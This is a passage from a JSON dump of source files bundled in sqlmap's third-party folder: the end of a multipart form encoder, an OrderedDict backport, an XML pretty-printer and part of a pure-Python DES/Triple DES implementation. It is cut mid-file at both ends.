mimetypes.guess_type(filename)[0] or b\"application/octet-stream\"\n            except:\n                # Reference: http://bugs.python.org/issue9291\n                contenttype = b\"application/octet-stream\"\n            buf += b\"--%s\\r\\n\" % getBytes(boundary)\n            buf += b\"Content-Disposition: form-data; name=\\\"%s\\\"; filename=\\\"%s\\\"\\r\\n\" % (getBytes(key), getBytes(filename))\n            buf += b\"Content-Type: %s\\r\\n\" % getBytes(contenttype)\n            # buf += b\"Content-Length: %s\\r\\n\" % file_size\n            fd.seek(0)\n\n            buf += b\"\\r\\n%s\\r\\n\" % fd.read()\n\n        buf += b\"--%s--\\r\\n\\r\\n\" % getBytes(boundary)\n        buf = getBytes(buf)\n\n        return boundary, buf\n\n    https_request = http_request\n"
  },
  {
    "path": "sqlmap/thirdparty/odict/__init__.py",
    "content": "#!/usr/bin/env python\n\nimport sys\n\nif sys.version_info[:2] >= (2, 7):\n    from collections import OrderedDict\nelse:\n    from ordereddict import OrderedDict\n"
  },
  {
    "path": "sqlmap/thirdparty/odict/ordereddict.py",
    "content": "# Copyright (c) 2009 Raymond Hettinger\n#\n# Permission is hereby granted, free of charge, to any person\n# obtaining a copy of this software and associated documentation files\n# (the \"Software\"), to deal in the Software without restriction,\n# including without limitation the rights to use, copy, modify, merge,\n# publish, distribute, sublicense, and/or sell copies of the Software,\n# and to permit persons to whom the Software is furnished to do so,\n# subject to the following conditions:\n#\n#     The above copyright notice and this permission notice shall be\n#     included in all copies or substantial portions of the Software.\n#\n#     THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n#     EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES\n#     OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\n#     NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT\n#     HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\n#     WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n#     FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR\n#     OTHER DEALINGS IN THE SOFTWARE.\n\ntry:\n    from UserDict import DictMixin\nexcept ImportError:\n    try:\n        from collections.abc import MutableMapping as DictMixin\n    except ImportError:\n        from collections import MutableMapping as DictMixin\n\nclass OrderedDict(dict, DictMixin):\n\n    def __init__(self, *args, **kwds):\n        if len(args) > 1:\n            raise TypeError('expected at most 1 arguments, got %d' % len(args))\n        try:\n            self.__end\n        except AttributeError:\n            self.clear()\n        self.update(*args, **kwds)\n\n    def clear(self):\n        self.__end = end = []\n        end += [None, end, end]         # sentinel node for doubly linked list\n        self.__map = {}                 # key --> [key, prev, next]\n        dict.clear(self)\n\n    def __setitem__(self, key, value):\n        if key not in self:\n            end = self.__end\n            curr = end[1]\n            curr[2] = end[1] = self.__map[key] = [key, curr, end]\n        dict.__setitem__(self, key, value)\n\n    def __delitem__(self, key):\n        dict.__delitem__(self, key)\n        key, prev, next = self.__map.pop(key)\n        prev[2] = next\n        next[1] = prev\n\n    def __iter__(self):\n        end = self.__end\n        curr = end[2]\n        while curr is not end:\n            yield curr[0]\n            curr = curr[2]\n\n    def __reversed__(self):\n        end = self.__end\n        curr = end[1]\n        while curr is not end:\n            yield curr[0]\n            curr = curr[1]\n\n    def popitem(self, last=True):\n        if not self:\n            raise KeyError('dictionary is empty')\n        if last:\n            key = next(reversed(self))\n        else:\n            key = next(iter(self))\n        value = self.pop(key)\n        return key, value\n\n    def __reduce__(self):\n        items = [[k, self[k]] for k in self]\n        tmp = self.__map, self.__end\n        del self.__map, self.__end\n        inst_dict = vars(self).copy()\n        self.__map, self.__end = tmp\n        if inst_dict:\n            return (self.__class__, (items,), inst_dict)\n        return self.__class__, (items,)\n\n    def keys(self):\n        return list(self)\n\n    setdefault = DictMixin.setdefault\n    update = DictMixin.update\n    pop = DictMixin.pop\n    values = DictMixin.values\n    items = DictMixin.items\n    iterkeys = DictMixin.iterkeys\n    itervalues = DictMixin.itervalues\n    iteritems = DictMixin.iteritems\n\n    def __repr__(self):\n        if not self:\n            return '%s()' % (self.__class__.__name__,)\n        return '%s(%r)' % (self.__class__.__name__, list(self.items()))\n\n    def copy(self):\n        return self.__class__(self)\n\n    @classmethod\n    def fromkeys(cls, iterable, value=None):\n        d = cls()\n        for key in iterable:\n            d[key] = value\n        return d\n\n    def __eq__(self, other):\n        if isinstance(other, OrderedDict):\n            if len(self) != len(other):\n                return False\n            for p, q in zip(self.items(), other.items()):\n                if p != q:\n                    return False\n            return True\n        return dict.__eq__(self, other)\n\n    def __ne__(self, other):\n        return not self == other\n"
  },
  {
    "path": "sqlmap/thirdparty/prettyprint/__init__.py",
    "content": "#!/usr/bin/env python\n\n#Copyright (c) 2010, Chris Hall <chris.hall@mod10.net>\n#All rights reserved.\n\n#Redistribution and use in source and binary forms, with or without modification,\n#are permitted provided that the following conditions are met:\n\n#* Redistributions of source code must retain the above copyright notice,\n#this list of conditions and the following disclaimer.\n#* Redistributions in binary form must reproduce the above copyright notice,\n#this list of conditions and the following disclaimer in the documentation\n#and/or other materials provided with the distribution.\n\n#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n#ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n#DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR\n#ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n#LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n#ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n#(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n#SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\npass\n"
  },
  {
    "path": "sqlmap/thirdparty/prettyprint/prettyprint.py",
    "content": "#!/usr/bin/env python\n\n#Copyright (c) 2010, Chris Hall <chris.hall@mod10.net>\n#All rights reserved.\n\n#Redistribution and use in source and binary forms, with or without modification,\n#are permitted provided that the following conditions are met:\n\n#* Redistributions of source code must retain the above copyright notice,\n#this list of conditions and the following disclaimer.\n#* Redistributions in binary form must reproduce the above copyright notice,\n#this list of conditions and the following disclaimer in the documentation\n#and/or other materials provided with the distribution.\n\n#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n#ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n#DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR\n#ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n#LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n#ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n#(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n#SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nfrom xml.dom import minidom\nfrom xml.dom import Node\n\ndef format(text):\n        doc = minidom.parseString(text)\n        root = doc.childNodes[0]\n        return root.toprettyxml(indent='  ')\n\ndef formatXML(doc, encoding=None):\n        root = doc.childNodes[0]\n        return root.toprettyxml(indent='  ', encoding=encoding)\n\ndef _patch_minidom():\n        minidom.Text.writexml = _writexml_text\n        minidom.Element.writexml = _writexml_element\n        minidom.Node.toprettyxml = _toprettyxml_node\n\ndef _collapse(node):\n        for child in node.childNodes:\n                if child.nodeType == Node.TEXT_NODE and len(child.data.strip()) == 0:\n                        child.data = ''\n                else:\n                        _collapse(child)\n\ndef _writexml_text(self, writer, indent=\"\", addindent=\"\", newl=\"\"):\n        minidom._write_data(writer, \"%s\"%(self.data.strip()))\n\ndef _writexml_element(self, writer, indent=\"\", addindent=\"\", newl=\"\"):\n        # indent = current indentation\n        # addindent = indentation to add to higher levels\n        # newl = newline string\n        writer.write(indent+\"<\" + self.tagName)\n\n        attrs = self._get_attributes()\n        a_names = attrs.keys()\n        a_names.sort()\n\n        for a_name in a_names:\n                writer.write(\" %s=\\\"\" % a_name)\n                minidom._write_data(writer, attrs[a_name].value)\n                writer.write(\"\\\"\")\n        if self.childNodes:\n                if self.childNodes[0].nodeType == Node.TEXT_NODE and len(self.childNodes[0].data) > 0:\n                        writer.write(\">\")\n                else:\n                        writer.write(\">%s\"%(newl))\n                for node in self.childNodes:\n                        node.writexml(writer,indent+addindent,addindent,newl)\n                if self.childNodes[-1].nodeType == Node.TEXT_NODE and len(self.childNodes[0].data) > 0:\n                        writer.write(\"</%s>%s\" % (self.tagName,newl))\n                else:\n                        writer.write(\"%s</%s>%s\" % (indent,self.tagName,newl))\n        else:\n                writer.write(\"/>%s\"%(newl))\n\ndef _toprettyxml_node(self, indent=\"\\t\", newl=\"\\n\", encoding = None):\n        _collapse(self)\n        # indent = the indentation string to prepend, per level\n        # newl = the newline string to append\n        writer = minidom._get_StringIO()\n        if encoding is not None:\n                import codecs\n                # Can't use codecs.getwriter to preserve 2.0 compatibility\n                writer = codecs.lookup(encoding)[3](writer)\n        if self.nodeType == Node.DOCUMENT_NODE:\n                # Can pass encoding only to document, to put it into XML header\n                self.writexml(writer, \"\", indent, newl, encoding)\n        else:\n                self.writexml(writer, \"\", indent, newl)\n        return writer.getvalue()\n\n_patch_minidom()\n"
  },
  {
    "path": "sqlmap/thirdparty/pydes/__init__.py",
    "content": "#!/usr/bin/env python\n#\n# Copyright 2009 Todd Whiteman\n#\n# This program is free software: you can redistribute it and/or modify it\n# under the terms of the GNU Lesser General Public License as published\n# by the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n# GNU Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program.  If not, see <http://www.gnu.org/licenses/>.\n#\n\npass\n"
  },
  {
    "path": "sqlmap/thirdparty/pydes/pyDes.py",
    "content": "#############################################################################\n# \t\t\t\tDocumentation\t\t\t\t    #\n#############################################################################\n\n# Author:   Todd Whiteman\n# Date:     16th March, 2009\n# Version:  2.0.1\n# License:  Public Domain - free to do as you wish\n# Homepage: http://twhiteman.netfirms.com/des.html\n#\n# This is a pure python implementation of the DES encryption algorithm.\n# It's pure python to avoid portability issues, since most DES \n# implementations are programmed in C (for performance reasons).\n#\n# Triple DES class is also implemented, utilising the DES base. Triple DES\n# is either DES-EDE3 with a 24 byte key, or DES-EDE2 with a 16 byte key.\n#\n# See the README.txt that should come with this python module for the\n# implementation methods used.\n#\n# Thanks to:\n#  * David Broadwell for ideas, comments and suggestions.\n#  * Mario Wolff for pointing out and debugging some triple des CBC errors.\n#  * Santiago Palladino for providing the PKCS5 padding technique.\n#  * Shaya for correcting the PAD_PKCS5 triple des CBC errors.\n#\n\"\"\"A pure python implementation of the DES and TRIPLE DES encryption algorithms.\n\nClass initialization\n--------------------\npyDes.des(key, [mode], [IV], [pad], [padmode])\npyDes.triple_des(key, [mode], [IV], [pad], [padmode])\n\nkey     -> Bytes containing the encryption key. 8 bytes for DES, 16 or 24 bytes\n\t   for Triple DES\nmode    -> Optional argument for encryption type, can be either\n\t   pyDes.ECB (Electronic Code Book) or pyDes.CBC (Cypher Block Chaining)\nIV      -> Optional Initial Value bytes, must be supplied if using CBC mode.\n\t   Length must be 8 bytes.\npad     -> Optional argument, set the pad character (PAD_NORMAL) to use during\n\t   all encrypt/decrpt operations done with this instance.\npadmode -> Optional argument, set the padding mode (PAD_NORMAL or PAD_PKCS5)\n\t   to use during all encrypt/decrpt operations done with this instance.\n\nI recommend to use PAD_PKCS5 padding, as then you never need to worry about any\npadding issues, as the padding can be removed unambiguously upon decrypting\ndata that was encrypted using PAD_PKCS5 padmode.\n\nCommon methods\n--------------\nencrypt(data, [pad], [padmode])\ndecrypt(data, [pad], [padmode])\n\ndata    -> Bytes to be encrypted/decrypted\npad     -> Optional argument. Only when using padmode of PAD_NORMAL. For\n\t   encryption, adds this characters to the end of the data block when\n\t   data is not a multiple of 8 bytes. For decryption, will remove the\n\t   trailing characters that match this pad character from the last 8\n\t   bytes of the unencrypted data block.\npadmode -> Optional argument, set the padding mode, must be one of PAD_NORMAL\n\t   or PAD_PKCS5). Defaults to PAD_NORMAL.\n\n\nExample\n-------\nfrom pyDes import *\n\ndata = \"Please encrypt my data\"\nk = des(\"DESCRYPT\", CBC, \"\\0\\0\\0\\0\\0\\0\\0\\0\", pad=None, padmode=PAD_PKCS5)\n# For Python3, you'll need to use bytes, i.e.:\n#   data = b\"Please encrypt my data\"\n#   k = des(b\"DESCRYPT\", CBC, b\"\\0\\0\\0\\0\\0\\0\\0\\0\", pad=None, padmode=PAD_PKCS5)\nd = k.encrypt(data)\nprint \"Encrypted: %r\" % d\nprint \"Decrypted: %r\" % k.decrypt(d)\nassert k.decrypt(d, padmode=PAD_PKCS5) == data\n\n\nSee the module source (pyDes.py) for more examples of use.\nYou can also run the pyDes.py file without and arguments to see a simple test.\n\nNote: This code was not written for high-end systems needing a fast\n      implementation, but rather a handy portable solution with small usage.\n\n\"\"\"\n\nimport sys\n\n# _pythonMajorVersion is used to handle Python2 and Python3 differences.\n_pythonMajorVersion = sys.version_info[0]\n\n# Modes of crypting / cyphering\nECB =\t0\nCBC =\t1\n\n# Modes of padding\nPAD_NORMAL = 1\nPAD_PKCS5 = 2\n\n# PAD_PKCS5: is a method that will unambiguously remove all padding\n#            characters after decryption, when originally encrypted with\n#            this padding mode.\n# For a good description of the PKCS5 padding technique, see:\n# http://www.faqs.org/rfcs/rfc1423.html\n\n# The base class shared by des and triple des.\nclass _baseDes(object):\n\tdef __init__(self, mode=ECB, IV=None, pad=None, padmode=PAD_NORMAL):\n\t\tif IV:\n\t\t\tIV = self._guardAgainstUnicode(IV)\n\t\tif pad:\n\t\t\tpad = self._guardAgainstUnicode(pad)\n\t\tself.block_size = 8\n\t\t# Sanity checking of arguments.\n\t\tif pad and padmode == PAD_PKCS5:\n\t\t\traise ValueError(\"Cannot use a pad character with PAD_PKCS5\")\n\t\tif IV and len(IV) != self.block_size:\n\t\t\traise ValueError(\"Invalid Initial Value (IV), must be a multiple of \" + str(self.block_size) + \" bytes\")\n\n\t\t# Set the passed in variables\n\t\tself._mode = mode\n\t\tself._iv = IV\n\t\tself._padding = pad\n\t\tself._padmode = padmode\n\n\tdef getKey(self):\n\t\t\"\"\"getKey() -> bytes\"\"\"\n\t\treturn self.__key\n\n\tdef setKey(self, key):\n\t\t\"\"\"Will set the crypting key for this object.\"\"\"\n\t\tkey = self._guardAgainstUnicode(key)\n\t\tself.__key = key\n\n\tdef getMode(self):\n\t\t\"\"\"getMode() -> pyDes.ECB or pyDes.CBC\"\"\"\n\t\treturn self._mode\n\n\tdef setMode(self, mode):\n\t\t\"\"\"Sets the type of crypting mode, pyDes.ECB or pyDes.CBC\"\"\"\n\t\tself._mode = mode\n\n\tdef getPadding(self):\n\t\t\"\"\"getPadding() -> bytes of length 1. Padding character.\"\"\"\n\t\treturn self._padding\n\n\tdef setPadding(self, pad):\n\t\t\"\"\"setPadding() -> bytes of length 1. Padding character.\"\"\"\n\t\tif pad is not None:\n\t\t\tpad = self._guardAgainstUnicode(pad)\n\t\tself._padding = pad\n\n\tdef getPadMode(self):\n\t\t\"\"\"getPadMode() -> pyDes.PAD_NORMAL or pyDes.PAD_PKCS5\"\"\"\n\t\treturn self._padmode\n\n\tdef setPadMode(self, mode):\n\t\t\"\"\"Sets the type of padding mode, pyDes.PAD_NORMAL or pyDes.PAD_PKCS5\"\"\"\n\t\tself._padmode = mode\n\n\tdef getIV(self):\n\t\t\"\"\"getIV() -> bytes\"\"\"\n\t\treturn self._iv\n\n\tdef setIV(self, IV):\n\t\t\"\"\"Will set the Initial Value, used in conjunction with CBC mode\"\"\"\n\t\tif not IV or len(IV) != self.block_size:\n\t\t\traise ValueError(\"Invalid Initial Value (IV), must be a multiple of \" + str(self.block_size) + \" bytes\")\n\t\tIV = self._guardAgainstUnicode(IV)\n\t\tself._iv = IV\n\n\tdef _padData(self, data, pad, padmode):\n\t\t# Pad data depending on the mode\n\t\tif padmode is None:\n\t\t\t# Get the default padding mode.\n\t\t\tpadmode = self.getPadMode()\n\t\tif pad and padmode == PAD_PKCS5:\n\t\t\traise ValueError(\"Cannot use a pad character with PAD_PKCS5\")\n\n\t\tif padmode == PAD_NORMAL:\n\t\t\tif len(data) % self.block_size == 0:\n\t\t\t\t# No padding required.\n\t\t\t\treturn data\n\n\t\t\tif not pad:\n\t\t\t\t# Get the default padding.\n\t\t\t\tpad = self.getPadding()\n\t\t\tif not pad:\n\t\t\t\traise ValueError(\"Data must be a multiple of \" + str(self.block_size) + \" bytes in length. Use padmode=PAD_PKCS5 or set the pad character.\")\n\t\t\tdata += (self.block_size - (len(data) % self.block_size)) * pad\n\n\t\telif padmode == PAD_PKCS5:\n\t\t\tpad_len = 8 - (len(data) % self.block_size)\n\t\t\tif _pythonMajorVersion < 3:\n\t\t\t\tdata += pad_len * chr(pad_len)\n\t\t\telse:\n\t\t\t\tdata += bytes([pad_len] * pad_len)\n\n\t\treturn data\n\n\tdef _unpadData(self, data, pad, padmode):\n\t\t# Unpad data depending on the mode.\n\t\tif not data:\n\t\t\treturn data\n\t\tif pad and padmode == PAD_PKCS5:\n\t\t\traise ValueError(\"Cannot use a pad character with PAD_PKCS5\")\n\t\tif padmode is None:\n\t\t\t# Get the default padding mode.\n\t\t\tpadmode = self.getPadMode()\n\n\t\tif padmode == PAD_NORMAL:\n\t\t\tif not pad:\n\t\t\t\t# Get the default padding.\n\t\t\t\tpad = self.getPadding()\n\t\t\tif pad:\n\t\t\t\tdata = data[:-self.block_size] + \\\n\t\t\t\t       data[-self.block_size:].rstrip(pad)\n\n\t\telif padmode == PAD_PKCS5:\n\t\t\tif _pythonMajorVersion < 3:\n\t\t\t\tpad_len = ord(data[-1])\n\t\t\telse:\n\t\t\t\tpad_len = data[-1]\n\t\t\tdata = data[:-pad_len]\n\n\t\treturn data\n\n\tdef _guardAgainstUnicode(self, data):\n\t\t# Only accept byte strings or ascii unicode values, otherwise\n\t\t# there is no way to correctly decode the data into bytes.\n\t\tif _pythonMajorVersion < 3:\n\t\t\tif isinstance(data, unicode):\n\t\t\t\traise ValueError(\"pyDes can only work with bytes, not Unicode strings.\")\n\t\telse:\n\t\t\tif isinstance(data, str):\n\t\t\t\t# Only accept ascii unicode values.\n\t\t\t\ttry:\n\t\t\t\t\treturn data.encode('ascii')\n\t\t\t\texcept UnicodeEncodeError:\n\t\t\t\t\tpass\n\t\t\t\traise ValueError(\"pyDes can only work with encoded strings, not Unicode.\")\n\t\treturn data\n\n#############################################################################\n# \t\t\t\t    DES\t\t\t\t\t    #\n#############################################################################\nclass des(_baseDes):\n\t\"\"\"DES encryption/decrytpion class\n\n\tSupports ECB (Electronic Code Book) and CBC (Cypher Block Chaining) modes.\n\n\tpyDes.des(key,[mode], [IV])\n\n\tkey  -> Bytes containing the encryption key, must be exactly 8 bytes\n\tmode -> Optional argument for encryption type, can be either pyDes.ECB\n\t\t(Electronic Code Book), pyDes.CBC (Cypher Block Chaining)\n\tIV   -> Optional Initial Value bytes, must be supplied if using CBC mode.\n\t\tMust be 8 bytes in length.\n\tpad  -> Optional argument, set the pad character (PAD_NORMAL) to use\n\t\tduring all encrypt/decrpt operations done with this instance.\n\tpadmode -> Optional argument, set the padding mode (PAD_NORMAL or\n\t\tPAD_PKCS5) to use during all encrypt/decrpt operations done\n\t\twith this instance.\n\t\"\"\"\n\n\n\t# Permutation and translation tables for DES\n\t__pc1 = [56, 48, 40, 32, 24, 16,  8,\n\t\t  0, 57, 49, 41, 33, 25, 17,\n\t\t  9,  1, 58, 50, 42, 34, 26,\n\t\t 18, 10,  2, 59, 51, 43, 35,\n\t\t 62, 54, 46, 38, 30, 22, 14,\n\t\t  6, 61, 53, 45, 37, 29, 21,\n\t\t 13,  5, 60, 52, 44, 36, 28,\n\t\t 20, 12,  4, 27, 19, 11,  3\n\t]\n\n\t# number left rotations of pc1\n\t__left_rotations = [\n\t\t1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1\n\t]\n\n\t# permuted choice key (table 2)\n\t__pc2 = [\n\t\t13, 16, 10, 23,  0,  4,\n\t\t 2, 27, 14,  5, 20,  9,\n\t\t22, 18, 11,  3, 25,  7,\n\t\t15,  6, 26, 19, 12,  1,\n\t\t40, 51, 30, 36, 46, 54,\n\t\t29, 39, 50, 44, 32, 47,\n\t\t43, 48, 38, 55, 33, 52,\n\t\t45, 41, 49, 35, 28, 31\n\t]\n\n\t# initial permutation IP\n\t__ip = [57, 49, 41, 33, 25, 17, 9,  1,\n\t\t59, 51, 43, 35, 27, 19, 11, 3,\n\t\t61, 53, 45, 37, 29, 21, 13, 5,\n\t\t63, 55, 47, 39, 31, 23, 15, 7,\n\t\t56, 48, 40, 32, 24, 16, 8,  0,\n\t\t58, 50, 42, 34, 26, 18, 10, 2,\n\t\t60, 52, 44, 36, 28, 20, 12, 4,\n\t\t62, 54, 46, 38, 30, 22, 14, 6\n\t]\n\n\t# Expansion table for turning 32 bit blocks into 48 bits\n\t__expansion_table = [\n\t\t31,  0,  1,  2,  3,  4,\n\t\t 3,  4,  5,  6,  7,  8,\n\t\t 7,  8,  9, 10, 11, 12,\n\t\t11, 12, 13, 14, 15, 16,\n\t\t15, 16, 17, 18, 19, 20,\n\t\t19, 20, 21, 22, 23, 24,\n\t\t23, 24, 25, 26, 27, 28,\n\t\t27, 28, 29, 30, 31,  0\n\t]\n\n\t# The (in)famous S-boxes\n\t__sbox = [\n\t\t# S1\n\t\t[14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7,\n\t\t 0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8,\n\t\t 4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0,\n\t\t 15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13],\n\n\t\t# S2\n\t\t[15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10,\n\t\t 3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5,\n\t\t 0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15,\n\t\t 13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9],\n\n\t\t# S3\n\t\t[10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8,\n\t\t 13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1,\n\t\t 13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7,\n\t\t 1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12],\n\n\t\t# S4\n\t\t[7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15,\n\t\t 13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9,\n\t\t 10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4,\n\t\t 3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14],\n\n\t\t# S5\n\t\t[2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9,\n\t\t 14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6,\n\t\t 4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14,\n\t\t 11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3],\n\n\t\t# S6\n\t\t[12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11,\n\t\t 10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8,\n\t\t 9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6,\n\t\t 4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13],\n\n\t\t# S7\n\t\t[4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1,\n\t\t 13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6,\n\t\t 1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2,\n\t\t 6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12],\n\n\t\t# S8\n\t\t[13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7,\n\t\t 1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2,\n\t\t 7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8,\n\t\t 2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11],\n\t]\n\n\n\t# 32-bit permutation function P used on the output of the S-boxes\n\t__p = [\n\t\t15, 6, 19, 20, 28, 11,\n\t\t27, 16, 0, 14, 22, 25,\n\t\t4, 17, 30, 9, 1, 7,\n\t\t23,13, 31, 26, 2, 8,\n\t\t18, 12, 29, 5, 21, 10,\n\t\t3, 24\n\t]\n\n\t# final permutation IP^-1\n\t__fp = [\n\t\t39,  7, 47, 15, 55, 23, 63, 31,\n\t\t38,  6, 46, 14, 54, 22, 62, 30,\n\t\t37,  5, 45, 13, 53, 21, 61, 29,\n\t\t36,  4, 44, 12, 52, 20, 60, 28,\n\t\t35,  3, 43, 11, 51, 19, 59, 27,\n\t\t34,  2, 42, 10, 50, 18, 58, 26,\n\t\t33,  1, 41,  9, 49, 17, 57, 25,\n\t\t32,  0, 40,  8, 48, 16, 56, 24\n\t]\n\n\t# Type of crypting being done\n\tENCRYPT =\t0x00\n\tDECRYPT =\t0x01\n\n\t# Initialisation\n\tdef __init__(self, key, mode=ECB, IV=None, pad=None, padmode=PAD_NORMAL):\n\t\t# Sanity checking of arguments.\n\t\tif len(key) != 8:\n\t\t\traise ValueError(\"Invalid DES key size. Key must be exactly 8 bytes long.\")\n\t\t_baseDes.__init__(self, mode, IV, pad, padmode)\n\t\tself.key_size = 8\n\n\t\tself.L = []\n\t\tself.R = []\n\t\tself.Kn = [ [0] * 48 ] * 16\t# 16 48-bit keys (K1 - K16)\n\t\tself.final = []\n\n\t\tself.setKey(key)\n\n\tdef setKey(self, key):\n\t\t\"\"\"Will set the crypting key for this object. Must be 8 bytes.\"\"\"\n\t\t_baseDes.setKey(self, key)\n\t\tself.__create_sub_keys()\n\n\tdef __String_to_BitList(self, data):\n\t\t\"\"\"Turn the string data, into a list of bits (1, 0)'s\"\"\"\n\t\tif _pythonMajorVersion < 3:\n\t\t\t# Turn the strings into integers. Python 3 uses a bytes\n\t\t\t# class, which already has this behaviour.\n\t\t\tdata = [ord(c) for c in data]\n\t\tl = len(data) * 8\n\t\tresult = [0] * l\n\t\tpos = 0\n\t\tfor ch in data:\n\t\t\ti = 7\n\t\t\twhile i >= 0:\n\t\t\t\tif ch & (1 << i) != 0:\n\t\t\t\t\tresult[pos] = 1\n\t\t\t\telse:\n\t\t\t\t\tresult[pos] = 0\n\t\t\t\tpos += 1\n\t\t\t\ti -= 1\n\n\t\treturn result\n\n\tdef __BitList_to_String(self, data):\n\t\t\"\"\"Turn the list of bits -> data, into a string\"\"\"\n\t\tresult = []\n\t\tpos = 0\n\t\tc = 0\n\t\twhile pos < len(data):\n\t\t\tc += data[pos] << (7 - (pos % 8))\n\t\t\tif (pos % 8) == 7:\n\t\t\t\tresult.append(c)\n\t\t\t\tc = 0\n\t\t\tpos += 1\n\n\t\tif _pythonMajorVersion < 3:\n\t\t\treturn ''.join([ chr(c) for c in result ])\n\t\telse:\n\t\t\treturn bytes(result)\n\n\tdef __permutate(self, table, block):\n\t\t\"\"\"Permutate this block with the specified table\"\"\"\n\t\treturn list(map(lambda x: block[x], table))\n\n\t# Transform the secret key, so that it is ready for data processing\n\t# Create the 16 subkeys, K[1] - K[16]\n\tdef __create_sub_keys(self):\n\t\t\"\"\"Create the 16 subkeys K[1] to K[16] from the given key\"\"\"\n\t\tkey = self.__permutate(des.__pc1, self.__String_to_BitList(self.getKey()))\n\t\ti = 0\n\t\t# Split into Left and Right sections\n\t\tself.L = key[:28]\n\t\tself.R = 